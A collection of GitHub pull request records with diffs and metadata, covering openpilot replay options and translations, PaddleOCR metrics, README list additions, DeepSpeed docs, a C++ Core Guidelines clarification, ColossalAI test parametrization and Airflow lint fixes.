- qDebug() << "allowlist" << allow;
-
+Replay::Replay(QString route, QStringList allow, QStringList block, SubMaster *sm_, QObject *parent) : sm(sm_), QObject(parent) {
std::vector<const char*> s;
for (const auto &it : services) {
if ((allow[0].size() == 0 || allow.contains(it.name)) &&
diff --git a/selfdrive/ui/replay/replay.h b/selfdrive/ui/replay/replay.h
index 8b7dc93b4a0382..7a1ea13c0ed6ab 100644
--- a/selfdrive/ui/replay/replay.h
+++ b/selfdrive/ui/replay/replay.h
@@ -20,7 +20,7 @@ class Replay : public QObject {
Q_OBJECT
public:
- Replay(QString route, SubMaster *sm = nullptr, QObject *parent = 0);
+ Replay(QString route, QStringList allow, QStringList block, SubMaster *sm = nullptr, QObject *parent = 0);
void start();
void addSegment(int n);
| https://api.github.com/repos/commaai/openpilot/pulls/22264 | 2021-09-17T07:06:18Z | 2021-09-17T07:33:23Z | 2021-09-17T07:33:23Z | 2021-09-17T07:33:24Z | 944 | commaai/openpilot | 8,988 | |
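The Qt `QCommandLineParser` setup in the diff above has a close analogue in Python's `argparse`; a hedged sketch of the same interface (optional positional route, `--allow`/`--block` lists, `--demo` fallback — the function name is hypothetical, the demo route is the one from the diff):

```python
import argparse

DEMO_ROUTE = "3533c53bb29502d1|2019-12-10--01-13-27"

def parse_replay_args(argv):
    p = argparse.ArgumentParser(
        description="Mock openpilot components by publishing logged messages.")
    p.add_argument("route", nargs="?", help="the drive to replay")
    p.add_argument("-a", "--allow", default="", help="whitelist of services")
    p.add_argument("-b", "--block", default="", help="blacklist of services")
    p.add_argument("--demo", action="store_true", help="use a demo route")
    args = p.parse_args(argv)
    if args.route is None and not args.demo:
        p.error("a route (or --demo) is required")  # mirrors showHelp()
    args.route = args.route or DEMO_ROUTE
    return args

args = parse_replay_args(["--demo", "--allow", "carState,modelV2"])
print(args.route, args.allow.split(","))
```

As in the C++ version, the positional argument is only required when `--demo` is absent, and the demo route fills in otherwise.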
Multilang: Update pt-BR translation | diff --git a/selfdrive/ui/translations/main_pt-BR.ts b/selfdrive/ui/translations/main_pt-BR.ts
index f983c8fb4b6fd2..e89a3b1f5a2fc1 100644
--- a/selfdrive/ui/translations/main_pt-BR.ts
+++ b/selfdrive/ui/translations/main_pt-BR.ts
@@ -68,23 +68,23 @@
</message>
<message>
<source>Hidden Network</source>
- <translation type="unfinished"></translation>
+ <translation>Rede Oculta</translation>
</message>
<message>
<source>CONNECT</source>
- <translation type="unfinished">CONEXÃO</translation>
+ <translation>CONECTE</translation>
</message>
<message>
<source>Enter SSID</source>
- <translation type="unfinished">Insira SSID</translation>
+ <translation>Digite o SSID</translation>
</message>
<message>
<source>Enter password</source>
- <translation type="unfinished">Insira a senha</translation>
+ <translation>Insira a senha</translation>
</message>
<message>
<source>for "%1"</source>
- <translation type="unfinished">para "%1"</translation>
+ <translation>para "%1"</translation>
</message>
</context>
<context>
| https://api.github.com/repos/commaai/openpilot/pulls/30987 | 2024-01-13T02:13:59Z | 2024-01-13T02:25:42Z | 2024-01-13T02:25:42Z | 2024-01-13T12:05:43Z | 323 | commaai/openpilot | 9,698 | |
update table metric | diff --git a/ppstructure/table/README.md b/ppstructure/table/README.md
index 3732a89c54..a5d0da3ccd 100644
--- a/ppstructure/table/README.md
+++ b/ppstructure/table/README.md
@@ -33,8 +33,8 @@ We evaluated the algorithm on the PubTabNet<sup>[1]</sup> eval dataset, and the
|Method|Acc|[TEDS(Tree-Edit-Distance-based Similarity)](https://github.com/ibm-aur-nlp/PubTabNet/tree/master/src)|Speed|
| --- | --- | --- | ---|
| EDD<sup>[2]</sup> |x| 88.3 |x|
-| TableRec-RARE(ours) |73.8%| 95.3% |1550ms|
-| SLANet(ours) | 76.2%| 95.85% |766ms|
+| TableRec-RARE(ours) | 71.73%| 93.88% |779ms|
+| SLANet(ours) | 76.31%| 95.89%|766ms|
The performance indicators are explained as follows:
- Acc: The accuracy of the table structure in each image, a wrong token is considered an error.
diff --git a/ppstructure/table/README_ch.md b/ppstructure/table/README_ch.md
index cc73f8bcec..e83c81befb 100644
--- a/ppstructure/table/README_ch.md
+++ b/ppstructure/table/README_ch.md
@@ -39,8 +39,8 @@
|算法|Acc|[TEDS(Tree-Edit-Distance-based Similarity)](https://github.com/ibm-aur-nlp/PubTabNet/tree/master/src)|Speed|
| --- | --- | --- | ---|
| EDD<sup>[2]</sup> |x| 88.3% |x|
-| TableRec-RARE(ours) |73.8%| 95.3% |1550ms|
-| SLANet(ours) | 76.2%| 95.85% |766ms|
+| TableRec-RARE(ours) | 71.73%| 93.88% |779ms|
+| SLANet(ours) |76.31%| 95.89%|766ms|
性能指标解释如下:
- Acc: 模型对每张图像里表格结构的识别准确率,错一个token就算错误。
| https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/7272 | 2022-08-20T08:43:20Z | 2022-08-21T02:56:08Z | 2022-08-21T02:56:08Z | 2022-08-21T02:56:08Z | 553 | PaddlePaddle/PaddleOCR | 42,767 | |
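The Acc metric described in the table above ("a wrong token is considered an error") is a per-image exact match over the predicted structure-token sequence. A hedged sketch of how such a score could be computed (the token lists are hypothetical examples, not PubTabNet data):

```python
def structure_accuracy(preds, gts):
    """Fraction of images whose predicted token sequence matches exactly."""
    assert len(preds) == len(gts)
    hits = sum(p == g for p, g in zip(preds, gts))
    return hits / len(gts)

gts = [["<table>", "<tr>", "<td>", "</td>", "</tr>", "</table>"]] * 2
preds = [gts[0],
         ["<table>", "<tr>", "<td>", "</tr>", "</table>"]]  # 2nd misses </td>
print(structure_accuracy(preds, gts))  # -> 0.5
```

TEDS is more forgiving: it scores partial credit via tree edit distance between the predicted and ground-truth table trees, which is why the TEDS numbers above sit well above the exact-match Acc.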
Add Land Transport Authority DataMall, Singapore | diff --git a/README.md b/README.md
index b2fcab633e..33ee3be429 100644
--- a/README.md
+++ b/README.md
@@ -1495,6 +1495,7 @@ API | Description | Auth | HTTPS | CORS |
| [Icelandic APIs](http://docs.apis.is/) | Open APIs that deliver services in or regarding Iceland | No | Yes | Unknown |
| [Impala Hotel Bookings](https://docs.impala.travel/docs/booking-api/) | Hotel content, rates and room bookings | `apiKey` | Yes | No |
| [Izi](http://api-docs.izi.travel/) | Audio guide for travellers | `apiKey` | Yes | Unknown |
+| [Land Transport Authority DataMall, Singapore](https://datamall.lta.gov.sg/content/dam/datamall/datasets/LTA_DataMall_API_User_Guide.pdf) | Singapore transport information | `apiKey` | No | Unknown |
| [Metro Lisboa](http://app.metrolisboa.pt/status/getLinhas.php) | Delays in subway lines | No | No | No |
| [Navitia](https://doc.navitia.io/) | The open API for building cool stuff with transport data | `apiKey` | Yes | Unknown |
| [Open Charge Map](https://openchargemap.org/site/develop/api) | Global public registry of electric vehicle charging locations | `apiKey` | Yes | Yes |
| <!-- Thank you for taking the time to work on a Pull Request for this project! -->
<!-- To ensure your PR is dealt with swiftly please check the following: -->
- [x] My submission is formatted according to the guidelines in the [contributing guide](/CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not have more than 100 characters
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [x] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
| https://api.github.com/repos/public-apis/public-apis/pulls/2787 | 2021-10-29T14:05:24Z | 2021-10-30T01:01:00Z | 2021-10-30T01:01:00Z | 2021-10-30T01:01:01Z | 312 | public-apis/public-apis | 35,778 |
[doc] xref to hostfile discussion | diff --git a/docs/_pages/features.md b/docs/_pages/features.md
index ec0724e11aa4..2074bb3e3b0f 100755
--- a/docs/_pages/features.md
+++ b/docs/_pages/features.md
@@ -28,7 +28,8 @@ deepspeed --hostfile=<hostfile> \
<client_entry.py> <client args> \
--deepspeed --deepspeed_config ds_config.json
```
-The script `<client_entry.py>` will execute on the resources specified in `<hostfile>`.
+The script `<client_entry.py>` will execute on the resources specified in
+[`<hostfile>`](/getting-started/#resource-configuration-multi-node).
## Pipeline Parallelism
DeepSpeed provides [pipeline parallelism](/tutorials/pipeline/) for memory-
| it wasn't clear where to find what was meant by `hostfile` - so adding a link to where it's discussed, now that I found it. | https://api.github.com/repos/microsoft/DeepSpeed/pulls/604 | 2020-12-15T20:14:43Z | 2020-12-15T21:44:33Z | 2020-12-15T21:44:33Z | 2020-12-15T21:47:04Z | 179 | microsoft/DeepSpeed | 10,319 |
Added Spark NLP to Scala NLP section | diff --git a/README.md b/README.md
index cba91027..6656f8c1 100644
--- a/README.md
+++ b/README.md
@@ -1350,6 +1350,7 @@ be
* [Chalk](https://github.com/scalanlp/chalk) - Chalk is a natural language processing library. **[Deprecated]**
* [FACTORIE](https://github.com/factorie/factorie) - FACTORIE is a toolkit for deployable probabilistic modeling, implemented as a software library in Scala. It provides its users with a succinct language for creating relational factor graphs, estimating parameters and performing inference.
* [Montague](https://github.com/Workday/upshot-montague) - Montague is a semantic parsing library for Scala with an easy-to-use DSL.
+* [Spark NLP](https://github.com/JohnSnowLabs/spark-nlp) - Natural language processing library built on top of Apache Spark ML to provide simple, performant, and accurate NLP annotations for machine learning pipelines, that scale easily in a distributed environment.
<a name="scala-data-analysis"></a>
#### Data Analysis / Data Visualization
| Spark NLP natively supports Apache Spark and sits on top of the Spark ML Pipeline. It comes with pre-trained models and the ability to train your own models by using machine learning and deep learning algorithms.
Spark NLP fully supports both Java/Scala and Python APIs. | https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/589 | 2019-02-12T10:58:38Z | 2019-02-14T14:19:40Z | 2019-02-14T14:19:40Z | 2019-02-14T14:44:00Z | 255 | josephmisiti/awesome-machine-learning | 51,764 |
E.15 Clarify when a rethrow would slice to `std::exception` | diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md
index 183e2497c..fe7622246 100644
--- a/CppCoreGuidelines.md
+++ b/CppCoreGuidelines.md
@@ -16093,7 +16093,7 @@ Catch by value can be appropriate for a small value type such as an `enum` value
##### Note
-To rethrow a caught exception use `throw;` not `throw e;`. Using `throw e;` would throw a new copy of `e` (sliced to the static type `std::exception`) instead of rethrowing the original exception of type `std::runtime_error`. (But keep [Don't try to catch every exception in every function](#Re-not-always) and [Minimize the use of explicit `try`/`catch`](#Re-catch) in mind.)
+To rethrow a caught exception use `throw;` not `throw e;`. Using `throw e;` would throw a new copy of `e` (sliced to the static type `std::exception`, when the exception is caught by `catch (const std::exception& e)`) instead of rethrowing the original exception of type `std::runtime_error`. (But keep [Don't try to catch every exception in every function](#Re-not-always) and [Minimize the use of explicit `try`/`catch`](#Re-catch) in mind.)
##### Enforcement
| Avoided a potential misunderstanding that `throw e` would slice *any* `e` to `std::exception`.
The note about rethrowing appears to have been written when the example of this item still used `catch (const exception& e)`, which was prior to commit d568d190f65a2cd9d3a3fde74cddbc5b5489bd99, "Generalized E.15, closes #1848". | https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/1949 | 2022-07-28T11:12:38Z | 2022-08-08T16:09:42Z | 2022-08-08T16:09:42Z | 2022-08-08T16:09:55Z | 317 | isocpp/CppCoreGuidelines | 16,008 |
add press release link | diff --git a/README.md b/README.md
index 371cdbfba783..5174c5140313 100755
--- a/README.md
+++ b/README.md
@@ -33,6 +33,7 @@ information [here](https://innovation.microsoft.com/en-us/exploring-ai-at-scale)
# News
+* [2021/05/24] [DeepSpeed: Accelerating large-scale model inference and training via system optimizations and compression](https://www.microsoft.com/en-us/research/blog/deepspeed-accelerating-large-scale-model-inference-and-training-via-system-optimizations-and-compression/)
* [2021/04/20] [1-bit LAMB: up to 4.6x less communication and 2.8x faster training, together with LAMB's convergence speed at large batch sizes](https://www.deepspeed.ai/tutorials/onebit-lamb/)
* [2021/04/19] [ZeRO-Infinity unlocks unprecedented model scale for deep learning training](https://www.microsoft.com/en-us/research/blog/zero-infinity-and-deepspeed-unlocking-unprecedented-model-scale-for-deep-learning-training/)
* [Tutorial on how to use different stages of ZeRO](https://www.deepspeed.ai/tutorials/zero/)
diff --git a/docs/index.md b/docs/index.md
index 9d60ed6e1298..cdb692ab6572 100755
--- a/docs/index.md
+++ b/docs/index.md
@@ -30,6 +30,7 @@ initiative to enable next-generation AI capabilities at scale, where you can fin
information [here](https://innovation.microsoft.com/en-us/exploring-ai-at-scale).
# What's New?
+* [2021/05/24] [DeepSpeed: Accelerating large-scale model inference and training via system optimizations and compression](https://www.microsoft.com/en-us/research/blog/deepspeed-accelerating-large-scale-model-inference-and-training-via-system-optimizations-and-compression/)
* [2021/04/20] [1-bit LAMB: up to 4.6x less communication and 2.8x faster training, together with LAMB's convergence speed at large batch sizes](https://www.deepspeed.ai/tutorials/onebit-lamb/)
* [2021/04/19] [ZeRO-Infinity unlocks unprecedented model scale for deep learning training](https://www.microsoft.com/en-us/research/blog/zero-infinity-and-deepspeed-unlocking-unprecedented-model-scale-for-deep-learning-training/)
* [Tutorial on how to use different stages of ZeRO](https://www.deepspeed.ai/tutorials/zero/)
| https://api.github.com/repos/microsoft/DeepSpeed/pulls/1094 | 2021-05-24T17:57:41Z | 2021-05-24T17:58:05Z | 2021-05-24T17:58:04Z | 2021-05-24T17:58:08Z | 574 | microsoft/DeepSpeed | 10,050 | |
[test] pytest parametrize | diff --git a/tests/test_zero_data_parallel/test_init_context.py b/tests/test_zero_data_parallel/test_init_context.py
index cf038844c1d2..938aad6018b3 100644
--- a/tests/test_zero_data_parallel/test_init_context.py
+++ b/tests/test_zero_data_parallel/test_init_context.py
@@ -28,11 +28,11 @@ def run_dist(rank, world_size, port):
@pytest.mark.dist
-def test_zero_init_context():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2, 4])
+def test_zero_init_context(world_size):
run_func = partial(run_dist, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
- test_zero_init_context()
+ test_zero_init_context(2)
diff --git a/tests/test_zero_data_parallel/test_shard_model_v2.py b/tests/test_zero_data_parallel/test_shard_model_v2.py
index 175abac10c3e..56af46e67ed6 100644
--- a/tests/test_zero_data_parallel/test_shard_model_v2.py
+++ b/tests/test_zero_data_parallel/test_shard_model_v2.py
@@ -30,12 +30,7 @@ def run_fwd_bwd(model, x, enable_autocast=False):
def run_dist(rank, world_size, port):
- colossalai.launch(config=CONFIG,
- rank=rank,
- world_size=world_size,
- host='localhost',
- port=port,
- backend='nccl')
+ colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
model = Net(checkpoint=True).cuda()
zero_model = copy.deepcopy(model)
@@ -52,11 +47,11 @@ def run_dist(rank, world_size, port):
@pytest.mark.dist
-def test_shard_model_v2():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2, 4])
+def test_shard_model_v2(world_size):
run_func = partial(run_dist, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
- test_shard_model_v2()
+ test_shard_model_v2(world_size=2)
diff --git a/tests/test_zero_data_parallel/test_shard_param.py b/tests/test_zero_data_parallel/test_shard_param.py
index 640292f31967..e324c30148be 100644
--- a/tests/test_zero_data_parallel/test_shard_param.py
+++ b/tests/test_zero_data_parallel/test_shard_param.py
@@ -4,19 +4,21 @@
from copy import deepcopy
from functools import partial
-import colossalai
-from colossalai.zero.sharded_param.sharded_param import ShardedParamV2
import pytest
import torch
import torch.multiprocessing as mp
+
+import colossalai
+from colossalai.zero.sharded_param.sharded_param import ShardedParamV2
from colossalai.zero.shard_utils import TensorShardStrategy
from colossalai.zero.sharded_param import ShardedTensor, ShardedParam
from colossalai.utils import free_port
from colossalai.logging import get_dist_logger, disable_existing_loggers
+
from tests.test_zero_data_parallel.common import Net, CONFIG, allclose
-def run_shard_tensor(rank, world_size, port):
+def _run_shard_tensor(rank, world_size, port):
colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
t = ShardedTensor(tensor=torch.randn(world_size * 2, 3))
assert list(t.origin_shape) == [world_size * 2, 3]
@@ -32,9 +34,9 @@ def run_shard_tensor(rank, world_size, port):
@pytest.mark.dist
-def test_shard_tensor():
- world_size = 2
- run_func = partial(run_shard_tensor, world_size=world_size, port=free_port())
+@pytest.mark.parametrize("world_size", [1, 2])
+def test_shard_tensor(world_size):
+ run_func = partial(_run_shard_tensor, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
@@ -50,8 +52,8 @@ def _run_shard_param_v2(rank, world_size, port):
@pytest.mark.dist
-def test_shard_param_v2():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2])
+def test_shard_param_v2(world_size):
run_func = partial(_run_shard_param_v2, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
@@ -84,40 +86,40 @@ def _run_test_shard_param(rank, world_size, port):
@pytest.mark.dist
-def test_shard_param():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2])
+def test_shard_param(world_size):
run_func = partial(_run_test_shard_param, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
-def run_init_shard_param(rank, world_size, port):
+def _run_init_shard_param(rank, world_size, port):
colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
- param = torch.nn.Parameter(data=torch.rand(2, 3))
+ param = torch.nn.Parameter(data=torch.rand(world_size, 3))
sparam = ShardedParam(param, None, True)
payload = sparam.payload(torch.device('cuda'))
assert (list(payload.shape) == [3])
del sparam
- param_shape = (2, 3)
+ param_shape = (world_size, 3)
sparam = ShardedParam(param_shape, process_group=None, is_sharded=True, device=torch.device('cpu'))
payload = sparam.payload(torch.device('cuda'))
assert (list(payload.shape) == [3])
- param_shape = (2, 3)
+ param_shape = (world_size, 3)
sparam = ShardedParam(param_shape, process_group=None, is_sharded=False, device=torch.device('cpu'))
payload = sparam.payload(torch.device('cuda'))
- assert (list(payload.shape) == [2, 3])
+ assert (list(payload.shape) == [world_size, 3])
@pytest.mark.dist
-def test_init_shard_param():
- world_size = 2
- run_func = partial(run_init_shard_param, world_size=world_size, port=free_port())
+@pytest.mark.parametrize("world_size", [1, 4])
+def test_init_shard_param(world_size):
+ run_func = partial(_run_init_shard_param, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
- test_shard_tensor()
- test_shard_param()
- test_shard_param_v2()
- test_init_shard_param()
+ test_shard_tensor(2)
+ test_shard_param(2)
+ test_shard_param_v2(2)
+ test_init_shard_param(4)
diff --git a/tests/test_zero_data_parallel/test_zero_param_mgr.py b/tests/test_zero_data_parallel/test_zero_param_mgr.py
index a38ed92863b4..8171a0946c89 100644
--- a/tests/test_zero_data_parallel/test_zero_param_mgr.py
+++ b/tests/test_zero_data_parallel/test_zero_param_mgr.py
@@ -1,41 +1,39 @@
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
-import os
from functools import partial
-from pathlib import Path
-
-import colossalai
import pytest
+
import torch
import torch.multiprocessing as mp
+
+import colossalai
from colossalai.zero.sharded_model.param_manager import Zero3ParameterManager
from colossalai.core import global_context as gpc
from colossalai.context.parallel_mode import ParallelMode
from colossalai.utils import free_port
from common import CONFIG
+
def run_shard_shape_check(rank, world_size, port):
- colossalai.launch(config=CONFIG,
- rank=rank,
- world_size=world_size,
- host='localhost',
- port=port,
- backend='nccl')
-
+ colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
+
model = torch.nn.Linear(2, 4 * world_size)
gpc.init_parallel_groups()
- Zero3ParameterManager(module=model, process_group=gpc.get_group(ParallelMode.DATA), offload_config=CONFIG.get('offload_param_config'))
+ Zero3ParameterManager(module=model,
+ process_group=gpc.get_group(ParallelMode.DATA),
+ offload_config=CONFIG.get('offload_param_config'))
- assert(model.weight.numel() == 4 * 2)
- assert(model.bias.numel() == 4)
+ assert (model.weight.numel() == 4 * 2)
+ assert (model.bias.numel() == 4)
@pytest.mark.dist
-def test_run_shard_shape():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2, 4])
+def test_run_shard_shape(world_size):
run_func = partial(run_shard_shape_check, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
+
if __name__ == '__main__':
- test_run_shard_shape()
+ test_run_shard_shape(2)
| https://api.github.com/repos/hpcaitech/ColossalAI/pulls/328 | 2022-03-08T03:52:13Z | 2022-03-08T07:10:22Z | 2022-03-08T07:10:21Z | 2022-03-08T07:10:22Z | 2,193 | hpcaitech/ColossalAI | 11,076 | |
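The launch pattern repeated throughout this diff — building `run_func` with `functools.partial` and handing it to `mp.spawn` — works because `mp.spawn` supplies only the rank argument, while `partial` pre-binds the rest. A minimal sketch with no real processes (names mirror the diff; nothing here touches torch):

```python
from functools import partial

def run_dist(rank, world_size, port):
    # mp.spawn would call this once per process with rank 0..nprocs-1;
    # world_size and port arrive pre-bound by partial.
    return (rank, world_size, port)

run_func = partial(run_dist, world_size=2, port=29500)
print([run_func(rank) for rank in range(2)])
# [(0, 2, 29500), (1, 2, 29500)]
```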
[Airflow-4668] Make airflow/contrib/utils Pylint compatible | diff --git a/airflow/contrib/utils/log/task_handler_with_custom_formatter.py b/airflow/contrib/utils/log/task_handler_with_custom_formatter.py
index 3fd690ccd8f46..83a2c6b619428 100644
--- a/airflow/contrib/utils/log/task_handler_with_custom_formatter.py
+++ b/airflow/contrib/utils/log/task_handler_with_custom_formatter.py
@@ -16,6 +16,9 @@
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
+"""
+Custom logging formatter for Airflow
+"""
import logging
@@ -25,10 +28,20 @@
class TaskHandlerWithCustomFormatter(StreamHandler):
+ """
+ Custom implementation of StreamHandler, a class which writes logging records for Airflow
+ """
def __init__(self, stream):
super().__init__()
+ self.prefix_jinja_template = None
def set_context(self, ti):
+ """
+ Accept the run-time context (i.e. the current task) and configure the formatter accordingly.
+
+ :param ti:
+ :return:
+ """
if ti.raw:
return
prefix = conf.get('core', 'task_log_prefix_template')
@@ -37,8 +50,8 @@ def set_context(self, ti):
if prefix:
_, self.prefix_jinja_template = parse_template_string(prefix)
rendered_prefix = self._render_prefix(ti)
-
- self.setFormatter(logging.Formatter(rendered_prefix + ":" + self.formatter._fmt))
+ formatter = logging.Formatter(rendered_prefix + ":" + self.formatter._fmt) # pylint:disable=W0212
+ self.setFormatter(formatter)
self.setLevel(self.level)
def _render_prefix(self, ti):
diff --git a/airflow/contrib/utils/sendgrid.py b/airflow/contrib/utils/sendgrid.py
index dfca195b56e25..243b46f47f465 100644
--- a/airflow/contrib/utils/sendgrid.py
+++ b/airflow/contrib/utils/sendgrid.py
@@ -16,6 +16,9 @@
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
+"""
+Airflow module for emailer using sendgrid
+"""
import base64
import mimetypes
@@ -30,8 +33,8 @@
from airflow.utils.log.logging_mixin import LoggingMixin
-def send_email(to, subject, html_content, files=None, dryrun=False, cc=None,
- bcc=None, mime_subtype='mixed', sandbox_mode=False, **kwargs):
+def send_email(to, subject, html_content, files=None, cc=None,
+ bcc=None, sandbox_mode=False, **kwargs):
"""
Send an email with html content using sendgrid.
@@ -104,8 +107,8 @@ def send_email(to, subject, html_content, files=None, dryrun=False, cc=None,
def _post_sendgrid_mail(mail_data):
log = LoggingMixin().log
- sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
- response = sg.client.mail.send.post(request_body=mail_data)
+ sendgrid_client = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
+ response = sendgrid_client.client.mail.send.post(request_body=mail_data)
# 2xx status code.
if 200 <= response.status_code < 300:
log.info('Email with subject %s is successfully sent to recipients: %s',
diff --git a/airflow/contrib/utils/weekday.py b/airflow/contrib/utils/weekday.py
index 8630e5a3dca7c..10bac42f5c2dd 100644
--- a/airflow/contrib/utils/weekday.py
+++ b/airflow/contrib/utils/weekday.py
@@ -16,6 +16,9 @@
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
+"""
+Get the ISO standard day number of the week from a given day string
+"""
import enum
diff --git a/scripts/ci/pylint_todo.txt b/scripts/ci/pylint_todo.txt
index 34b7c4b6f0504..55afbe991d6c9 100644
--- a/scripts/ci/pylint_todo.txt
+++ b/scripts/ci/pylint_todo.txt
@@ -130,9 +130,8 @@
./airflow/contrib/sensors/sftp_sensor.py
./airflow/contrib/sensors/wasb_sensor.py
./airflow/contrib/sensors/weekday_sensor.py
-./airflow/contrib/utils/log/task_handler_with_custom_formatter.py
-./airflow/contrib/utils/sendgrid.py
-./airflow/contrib/utils/weekday.py
+./airflow/gcp/utils/mlengine_operator_utils.py
+./airflow/gcp/utils/mlengine_prediction_summary.
./airflow/exceptions.py
./airflow/executors/base_executor.py
./airflow/executors/celery_executor.py
diff --git a/tests/contrib/utils/logging_command_executor.py b/tests/contrib/utils/logging_command_executor.py
index 9c5678cea9580..d79da868b16a4 100644
--- a/tests/contrib/utils/logging_command_executor.py
+++ b/tests/contrib/utils/logging_command_executor.py
@@ -27,8 +27,8 @@ class LoggingCommandExecutor(LoggingMixin):
def execute_cmd(self, cmd, silent=False, cwd=None):
if silent:
self.log.info("Executing in silent mode: '{}'".format(" ".join(cmd)))
- with open(os.devnull, 'w') as FNULL:
- return subprocess.call(args=cmd, stdout=FNULL, stderr=subprocess.STDOUT)
+ with open(os.devnull, 'w') as dev_null:
+ return subprocess.call(args=cmd, stdout=dev_null, stderr=subprocess.STDOUT)
else:
self.log.info("Executing: '{}'".format(" ".join(cmd)))
process = subprocess.Popen(
diff --git a/tests/contrib/utils/run_once_decorator.py b/tests/contrib/utils/run_once_decorator.py
index 934250ec2ffa7..89120446f9270 100644
--- a/tests/contrib/utils/run_once_decorator.py
+++ b/tests/contrib/utils/run_once_decorator.py
@@ -31,5 +31,6 @@ def wrapper(*args, **kwargs):
result = f(*args, **kwargs)
wrapper.has_run = True
return result
+ return None
wrapper.has_run = False
return wrapper
diff --git a/tests/contrib/utils/test_sendgrid.py b/tests/contrib/utils/test_sendgrid.py
index cb92d654baf34..3561548341e11 100644
--- a/tests/contrib/utils/test_sendgrid.py
+++ b/tests/contrib/utils/test_sendgrid.py
@@ -30,10 +30,10 @@
class TestSendEmailSendGrid(unittest.TestCase):
# Unit test for sendgrid.send_email()
def setUp(self):
- self.to = ['foo@foo.com', 'bar@bar.com']
+ self.recepients = ['foo@foo.com', 'bar@bar.com']
self.subject = 'sendgrid-send-email unit test'
self.html_content = '<b>Foo</b> bar'
- self.cc = ['foo-cc@foo.com', 'bar-cc@bar.com']
+ self.carbon_copy = ['foo-cc@foo.com', 'bar-cc@bar.com']
self.bcc = ['foo-bcc@foo.com', 'bar-bcc@bar.com']
self.expected_mail_data = {
'content': [{'type': 'text/html', 'value': self.html_content}],
@@ -83,10 +83,10 @@ def test_send_email_sendgrid_correct_email(self, mock_post):
}],
)
- send_email(self.to,
+ send_email(self.recepients,
self.subject,
self.html_content,
- cc=self.cc,
+ cc=self.carbon_copy,
bcc=self.bcc,
files=[f.name])
mock_post.assert_called_once_with(expected_mail_data)
@@ -100,7 +100,7 @@ def test_send_email_sendgrid_correct_email(self, mock_post):
)
@mock.patch('airflow.contrib.utils.sendgrid._post_sendgrid_mail')
def test_send_email_sendgrid_correct_email_extras(self, mock_post):
- send_email(self.to, self.subject, self.html_content, cc=self.cc, bcc=self.bcc,
+ send_email(self.recepients, self.subject, self.html_content, cc=self.carbon_copy, bcc=self.bcc,
personalization_custom_args=self.personalization_custom_args,
categories=self.categories)
mock_post.assert_called_once_with(self.expected_mail_data_extras)
@@ -108,6 +108,6 @@ def test_send_email_sendgrid_correct_email_extras(self, mock_post):
@mock.patch('os.environ', {})
@mock.patch('airflow.contrib.utils.sendgrid._post_sendgrid_mail')
def test_send_email_sendgrid_sender(self, mock_post):
- send_email(self.to, self.subject, self.html_content, cc=self.cc, bcc=self.bcc,
+ send_email(self.recepients, self.subject, self.html_content, cc=self.carbon_copy, bcc=self.bcc,
from_email='foo@foo.bar', from_name='Foo Bar')
mock_post.assert_called_once_with(self.expected_mail_data_sender)
diff --git a/tests/contrib/utils/test_weekday.py b/tests/contrib/utils/test_weekday.py
index 3b4384344cb2c..906eec52005ed 100644
--- a/tests/contrib/utils/test_weekday.py
+++ b/tests/contrib/utils/test_weekday.py
@@ -31,12 +31,12 @@ def test_weekday_name_value(self):
weekdays = "MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY SUNDAY"
weekdays = weekdays.split()
for i, weekday in enumerate(weekdays, start=1):
- e = WeekDay(i)
- self.assertEqual(e, i)
- self.assertEqual(int(e), i)
- self.assertEqual(e.name, weekday)
- self.assertTrue(e in WeekDay)
- self.assertTrue(0 < e < 8)
- self.assertTrue(type(e) is WeekDay)
- self.assertTrue(isinstance(e, int))
- self.assertTrue(isinstance(e, Enum))
+ weekday_enum = WeekDay(i)
+ self.assertEqual(weekday_enum, i)
+ self.assertEqual(int(weekday_enum), i)
+ self.assertEqual(weekday_enum.name, weekday)
+ self.assertTrue(weekday_enum in WeekDay)
+ self.assertTrue(0 < weekday_enum < 8)
+ self.assertIsInstance(weekday_enum, WeekDay)
+ self.assertIsInstance(weekday_enum, int)
+ self.assertIsInstance(weekday_enum, Enum)
| Make sure you have checked _all_ steps below.
### Jira
- [x] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title. For example, "\[AIRFLOW-XXX\] My Airflow PR"
- https://issues.apache.org/jira/browse/AIRFLOW-4668
